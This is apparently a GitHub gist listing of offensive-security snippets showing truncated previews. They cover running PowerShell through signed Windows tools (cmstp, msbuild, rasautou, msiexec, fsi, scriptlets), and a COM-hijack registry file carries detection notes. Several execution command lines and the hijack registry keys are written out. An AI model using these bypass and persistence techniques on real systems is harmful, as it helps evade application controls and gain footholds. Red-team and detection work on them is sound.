
View coregen.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
namespace Export
{
class Test
View cmstp.inf
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
View cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
View rasautou.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;
// Compile with Unmanaged Exports (RGiesecke.DllExport) and a reference to System.Management.Automation.
// rasautou -d powershell.dll -p powershell -a a -e e
NickTyrer / PSA_MSBUILD64.csproj
Created Nov 18, 2016
PSAttack Using MSBuild Bytestream
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith's work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371) -->
<!-- and on Jared Haight's work (https://github.com/jaredhaight/PSAttack). -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
View msiexec.cs
// msiexec /z "full path to msiexec.dll"
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
View com_hijack.reg
Windows Registry Editor Version 5.00
; Per-user COM class registration (the pattern MITRE ATT&CK tracks as T1546.015,
; Component Object Model Hijacking). Both keys sit under
; HKEY_CURRENT_USER\Software\Classes, so writing them needs no administrative rights.
; For processes that are not elevated, a CLSID registered in the per-user hive is
; resolved ahead of the machine-wide HKLM\Software\Classes entry; elevated processes
; ignore the per-user COM registration.
; Detection: audit creation or modification of ...\CLSID\{guid}\InProcServer32 under
; HKCU\Software\Classes (for example with registry-event logging), and compare any
; per-user CLSID against the machine-wide registration of the same GUID.
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
; Default value = the DLL loaded in-process when this CLSID is activated. Here it
; points at a Visual Studio debug build inside a user profile; an InProcServer32
; path in a user-writable directory is a strong triage signal.
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
NickTyrer / fsharp.fsscript
Created Sep 3, 2017
fsi.exe inline execution
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()
View powersct.sct
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script